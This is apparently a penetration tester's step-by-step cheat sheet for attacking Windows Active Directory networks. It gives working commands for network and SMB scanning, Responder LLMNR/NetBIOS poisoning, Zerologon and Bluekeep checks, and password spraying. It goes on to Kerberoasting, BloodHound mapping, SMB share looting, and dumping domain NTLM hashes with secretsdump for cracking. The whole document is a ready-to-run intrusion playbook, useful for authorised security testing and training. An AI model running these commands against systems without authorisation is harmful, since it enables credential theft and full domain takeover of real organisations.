Methodology

Run nmap

mkdir scan
nmap -T4 -iL scope.txt -Pn -p21,22,139,445,3389,88,389,135,1433,3306 --open -vv -oG scan/alive.txt
nmap -T4 -sV -sC --script=banner --script=vulners -iL --top-ports 3700 scope.txt -vv -oA scan/full-tcp-res
nmap -T4 -sV -p445 -Pn -iL scope.txt -vv --script smb-security-mode --script smb-vuln-ms17-010 -oA scan/smb-scan

Identify DC

Run cme on all shares, find open/unauthenticated ones
- cme smb smb-ips.txt -u '' -p '' --shares
Discover HTTP services
1. httpx
2. nuclei
3. gowitness (to discover admin panels)
NetBIOS/LLMNR Spoofing
- sudo python2 [Responder.py](<http://responder.py/>) -I eth0 -wrFP

DC Sync / Zerologon

git clone <https://github.com/SecuraBV/CVE-2020-1472>
pip install -r requirements.txt
./zerologon_tester.py EXAMPLE-DC 1.2.3.4

Bluekeep

git clone <https://github.com/robertdavidgraham/rdpscan.git>
make
rdpscan 192.168.1.1-192.168.1.255

Password spray the DC
1. The ones cracked from the responder
Checking default credentials embedded devices
Checking "dumb-ports”
1. FTP, Telnet etc

When you get credentials (Must check)

Kerberoasting
- python3 [GetUserSPN.py](<http://getuserspn.py/>) -request -dc-ip <dc ip> acme.corp/JOHNNY.WALKER -o tickets.txt
Bloodhound
- bloodhound-python -u "USER" -p "PASS" --dns-tcp -ns <dc ip> -dc somedc.acme.corp -d amce.corp -c all
Slinky - Expand Access
- cme smb hosts.txt -u 'user' -p 'pass' -M slinky -o NAME=0123

Explore all of them

cme smb hosts.txt -u 'user' -p 'pass' --shares | tee auth-user-1
cat auth-user-1 | grep -ai "read\\|write"
smbclient.py user@ip
# You can also try ftp shares with these creds with limited success. 
# Perhaps also ssh ;)

After getting DA

Dump Passwords & Crack

python3 secretsdump.py -just-dc-ntlm CORP/[email protected] | tee -a dump
cme smb ips.txt -u 'user' -p 'pass' --pass-pol # for screenshot for finding

Useful Links

WADComs - An interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.